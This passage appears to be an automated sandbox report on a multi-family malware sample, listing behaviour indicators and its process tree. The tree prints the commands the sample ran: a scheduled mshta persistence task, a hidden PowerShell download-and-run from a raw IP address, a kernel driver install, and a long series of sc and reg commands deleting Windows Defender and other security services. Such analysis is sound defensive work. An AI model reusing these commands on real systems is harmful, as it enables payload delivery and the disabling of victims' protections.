\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage cab1283345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c8d23ef22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5969479a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a11d930.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KXtPusH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53e64105fd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 12636 PING.EXE 8252 PING.EXE 10044 PING.EXE 10232 PING.EXE 12976 PING.EXE 13472 PING.EXE 13184 PING.EXE 13364 PING.EXE 9872 PING.EXE 11340 PING.EXE 11796 PING.EXE 13132 PING.EXE 6152 PING.EXE 8540 PING.EXE 5316 PING.EXE 11308 PING.EXE 11428 PING.EXE 12516 PING.EXE 8196 PING.EXE 10080 PING.EXE 10660 PING.EXE 13080 PING.EXE 9128 PING.EXE 11104 PING.EXE 13084 PING.EXE 12176 PING.EXE 7752 PING.EXE 7780 PING.EXE 11240 PING.EXE 12508 PING.EXE 13104 PING.EXE 7260 PING.EXE 11296 PING.EXE 11364 PING.EXE 13708 PING.EXE 10880 PING.EXE 12320 PING.EXE 13188 PING.EXE 10856 PING.EXE 8612 PING.EXE 11920 PING.EXE 7724 PING.EXE 8884 PING.EXE 10008 PING.EXE 10896 PING.EXE 14200 PING.EXE 8468 PING.EXE 9836 PING.EXE 11116 PING.EXE 11608 PING.EXE 13712 PING.EXE 5760 PING.EXE 10064 PING.EXE 13392 PING.EXE 9892 PING.EXE 12212 PING.EXE 14252 PING.EXE 12712 PING.EXE 10848 PING.EXE 12268 PING.EXE 13384 PING.EXE 13960 PING.EXE 13452 PING.EXE 14324 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5088 netsh.exe 4420 cmd.exe 1252 netsh.exe 3748 cmd.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ddb314f467.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 KXtPusH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier KXtPusH.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ddb314f467.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4540 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2456 taskkill.exe 6096 taskkill.exe 1084 taskkill.exe 4996 taskkill.exe 1408 taskkill.exe -
Runs ping.exe 1 TTPs 64 IoCs
pid Process 7044 PING.EXE 9512 PING.EXE 10720 PING.EXE 12712 PING.EXE 12924 PING.EXE 2108 PING.EXE 6392 PING.EXE 12976 PING.EXE 13764 PING.EXE 13596 PING.EXE 6448 PING.EXE 9920 PING.EXE 11380 PING.EXE 11716 PING.EXE 12096 PING.EXE 12540 PING.EXE 14220 PING.EXE 11296 PING.EXE 11364 PING.EXE 14016 PING.EXE 14040 PING.EXE 6808 PING.EXE 10660 PING.EXE 11516 PING.EXE 7644 PING.EXE 8720 PING.EXE 9444 PING.EXE 10028 PING.EXE 10256 PING.EXE 13632 PING.EXE 13060 PING.EXE 13872 PING.EXE 7372 PING.EXE 10044 PING.EXE 11116 PING.EXE 13248 PING.EXE 12980 PING.EXE 11848 PING.EXE 712 PING.EXE 9376 PING.EXE 10604 PING.EXE 10628 PING.EXE 11164 PING.EXE 12500 PING.EXE 7788 PING.EXE 9652 PING.EXE 8252 PING.EXE 9032 PING.EXE 956 PING.EXE 12992 PING.EXE 13276 PING.EXE 12544 PING.EXE 2164 PING.EXE 5340 PING.EXE 9668 PING.EXE 10468 PING.EXE 8312 PING.EXE 11184 PING.EXE 12568 PING.EXE 13268 PING.EXE 13392 PING.EXE 14284 PING.EXE 7684 PING.EXE 10372 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4088 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5200 powershell.exe 5200 powershell.exe 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 4052 rapes.exe 4052 rapes.exe 3736 KXtPusH.exe 3736 KXtPusH.exe 3736 KXtPusH.exe 3736 KXtPusH.exe 3736 KXtPusH.exe 448 2c8d23ef22.exe 448 2c8d23ef22.exe 448 2c8d23ef22.exe 448 2c8d23ef22.exe 448 2c8d23ef22.exe 448 2c8d23ef22.exe 4660 rapes.exe 4660 rapes.exe 3204 ddb314f467.exe 3204 ddb314f467.exe 5300 cab1283345.exe 5300 cab1283345.exe 4704 53e64105fd.exe 4704 53e64105fd.exe 5300 cab1283345.exe 5300 cab1283345.exe 4704 53e64105fd.exe 4704 53e64105fd.exe 4704 53e64105fd.exe 4060 MSBuild.exe 4060 MSBuild.exe 4060 MSBuild.exe 4060 MSBuild.exe 2220 176117a9a6.exe 2220 176117a9a6.exe 2220 176117a9a6.exe 2220 176117a9a6.exe 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 5996 Rm3cVPI.exe 5996 Rm3cVPI.exe 5996 Rm3cVPI.exe 5996 Rm3cVPI.exe 1200 MSBuild.exe 1200 MSBuild.exe 1200 MSBuild.exe 1200 MSBuild.exe 5072 rapes.exe 5072 rapes.exe 2356 ac5082e7c9.exe 2356 ac5082e7c9.exe 2356 ac5082e7c9.exe 2356 ac5082e7c9.exe 2356 ac5082e7c9.exe 2356 ac5082e7c9.exe 8808 MSBuild.exe 8808 MSBuild.exe 8808 MSBuild.exe 8808 MSBuild.exe 10944 Passwords.com 10944 Passwords.com 10944 Passwords.com -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 660 Process not Found 660 Process not Found 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3228 UZPt0hR.exe 3228 UZPt0hR.exe 3228 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 5200 powershell.exe Token: 33 4980 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4980 AUDIODG.EXE Token: SeDebugPrivilege 3736 KXtPusH.exe Token: SeDebugPrivilege 2456 taskkill.exe Token: SeDebugPrivilege 6096 taskkill.exe Token: SeDebugPrivilege 1084 taskkill.exe Token: SeDebugPrivilege 4996 taskkill.exe Token: SeDebugPrivilege 1408 taskkill.exe Token: SeDebugPrivilege 5240 firefox.exe Token: SeDebugPrivilege 5240 firefox.exe Token: SeDebugPrivilege 4704 53e64105fd.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 7864 5a11d930.exe Token: SeBackupPrivilege 7864 5a11d930.exe Token: SeRestorePrivilege 7864 5a11d930.exe Token: SeLoadDriverPrivilege 7864 5a11d930.exe Token: SeShutdownPrivilege 7864 5a11d930.exe Token: SeSystemEnvironmentPrivilege 7864 5a11d930.exe Token: SeSecurityPrivilege 7864 5a11d930.exe Token: SeDebugPrivilege 10000 tasklist.exe Token: SeDebugPrivilege 10320 tasklist.exe Token: SeBackupPrivilege 7864 5a11d930.exe Token: SeRestorePrivilege 7864 5a11d930.exe Token: SeDebugPrivilege 7864 5a11d930.exe Token: SeSystemEnvironmentPrivilege 7864 5a11d930.exe Token: SeSecurityPrivilege 7864 5a11d930.exe Token: SeCreatePermanentPrivilege 7864 5a11d930.exe Token: SeShutdownPrivilege 7864 5a11d930.exe Token: SeLoadDriverPrivilege 7864 5a11d930.exe Token: SeIncreaseQuotaPrivilege 7864 5a11d930.exe Token: SeSecurityPrivilege 7864 5a11d930.exe Token: SeSystemProfilePrivilege 7864 5a11d930.exe Token: SeDebugPrivilege 7864 5a11d930.exe Token: SeMachineAccountPrivilege 7864 5a11d930.exe Token: SeCreateTokenPrivilege 7864 5a11d930.exe Token: SeAssignPrimaryTokenPrivilege 7864 5a11d930.exe Token: SeTcbPrivilege 7864 5a11d930.exe Token: SeAuditPrivilege 7864 5a11d930.exe Token: SeSystemEnvironmentPrivilege 7864 5a11d930.exe Token: SeLoadDriverPrivilege 7864 5a11d930.exe Token: SeLoadDriverPrivilege 7864 5a11d930.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5300 cab1283345.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5300 cab1283345.exe 5240 firefox.exe 5300 cab1283345.exe 5300 cab1283345.exe 10944 Passwords.com 10944 Passwords.com 10944 Passwords.com -
Suspicious use of SendNotifyMessage 29 IoCs
pid Process 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5300 cab1283345.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5240 firefox.exe 5300 cab1283345.exe 5300 cab1283345.exe 5300 cab1283345.exe 10944 Passwords.com 10944 Passwords.com 10944 Passwords.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5240 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5328 wrote to memory of 5100 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 5328 wrote to memory of 5100 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 5328 wrote to memory of 5100 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 5328 wrote to memory of 2372 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5328 wrote to memory of 2372 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5328 wrote to memory of 2372 5328 2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5100 wrote to memory of 4088 5100 cmd.exe 88 PID 5100 wrote to memory of 4088 5100 cmd.exe 88 PID 5100 wrote to memory of 4088 5100 cmd.exe 88 PID 2372 wrote to memory of 5200 2372 mshta.exe 91 PID 2372 wrote to memory of 5200 2372 mshta.exe 91 PID 2372 wrote to memory of 5200 2372 mshta.exe 91 PID 5200 wrote to memory of 3068 5200 powershell.exe 102 PID 5200 wrote to memory of 3068 5200 powershell.exe 102 PID 5200 wrote to memory of 3068 5200 powershell.exe 102 PID 3068 wrote to memory of 4052 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 103 PID 3068 wrote to memory of 4052 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 103 PID 3068 wrote to memory of 4052 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 103 PID 4052 wrote to memory of 4428 4052 rapes.exe 104 PID 4052 wrote to memory of 4428 4052 rapes.exe 104 PID 4052 wrote to memory of 4428 4052 rapes.exe 104 PID 4428 wrote to memory of 1000 4428 apple.exe 105 PID 4428 wrote to memory of 1000 4428 apple.exe 105 PID 4428 wrote to memory of 1000 4428 apple.exe 105 PID 1000 wrote to memory of 1268 1000 261.exe 107 PID 1000 wrote to memory of 1268 1000 261.exe 107 PID 1268 wrote to memory of 2368 1268 cmd.exe 109 PID 1268 wrote to memory of 2368 1268 cmd.exe 109 PID 1268 wrote to memory of 2368 1268 cmd.exe 109 PID 2368 wrote to memory of 2932 2368 261.exe 110 PID 2368 wrote to memory of 2932 2368 261.exe 110 PID 2932 wrote to memory of 1840 2932 cmd.exe 112 PID 2932 wrote to memory of 1840 2932 cmd.exe 112 PID 2932 wrote to memory of 2960 2932 cmd.exe 113 PID 2932 wrote to memory of 2960 2932 cmd.exe 113 PID 2932 wrote to memory of 4540 2932 cmd.exe 114 PID 2932 wrote to memory of 4540 2932 cmd.exe 114 PID 2932 wrote to memory of 3284 2932 cmd.exe 115 PID 2932 wrote to memory of 3284 2932 cmd.exe 115 PID 2932 wrote to memory of 856 2932 cmd.exe 116 PID 2932 wrote to memory of 856 2932 cmd.exe 116 PID 2932 wrote to memory of 1716 2932 cmd.exe 117 PID 2932 wrote to memory of 1716 2932 cmd.exe 117 PID 2932 wrote to memory of 5796 2932 cmd.exe 118 PID 2932 wrote to memory of 5796 2932 cmd.exe 118 PID 2932 wrote to memory of 1740 2932 cmd.exe 119 PID 2932 wrote to memory of 1740 2932 cmd.exe 119 PID 2932 wrote to memory of 2592 2932 cmd.exe 120 PID 2932 wrote to memory of 2592 2932 cmd.exe 120 PID 2932 wrote to memory of 5500 2932 cmd.exe 121 PID 2932 wrote to memory of 5500 2932 cmd.exe 121 PID 2932 wrote to memory of 2780 2932 cmd.exe 122 PID 2932 wrote to memory of 2780 2932 cmd.exe 122 PID 2932 wrote to memory of 1272 2932 cmd.exe 123 PID 2932 wrote to memory of 1272 2932 cmd.exe 123 PID 2932 wrote to memory of 3668 2932 cmd.exe 124 PID 2932 wrote to memory of 3668 2932 cmd.exe 124 PID 2932 wrote to memory of 2884 2932 cmd.exe 125 PID 2932 wrote to memory of 2884 2932 cmd.exe 125 PID 2932 wrote to memory of 5804 2932 cmd.exe 126 PID 2932 wrote to memory of 5804 2932 cmd.exe 126 PID 2932 wrote to memory of 5348 2932 cmd.exe 127 PID 2932 wrote to memory of 5348 2932 cmd.exe 127 PID 2932 wrote to memory of 5864 2932 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5328 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn SUhHfmaGkDK /tr "mshta C:\Users\Admin\AppData\Local\Temp\zlnZCJJrI.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn SUhHfmaGkDK /tr "mshta C:\Users\Admin\AppData\Local\Temp\zlnZCJJrI.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4088
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\zlnZCJJrI.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Users\Admin\AppData\Local\TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE"C:\Users\Admin\AppData\Local\TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B73A.tmp\B73B.tmp\B73C.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B844.tmp\B845.tmp\B846.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:1840
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2960
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:4540
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3284
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:856
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1716
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5796
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1740
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:5500
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:2780
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1272
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:3668
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2884
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:5804
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:5348
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:5864
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:5492
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:5284
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:5512
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:1956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:1348
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:3156
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:5504
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5692
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:5360
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:4760
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:3008
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:6064
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:3308
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1292
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:4424
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:4452
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:3400
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:3952
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:5328
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:4088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:2364
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:448
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
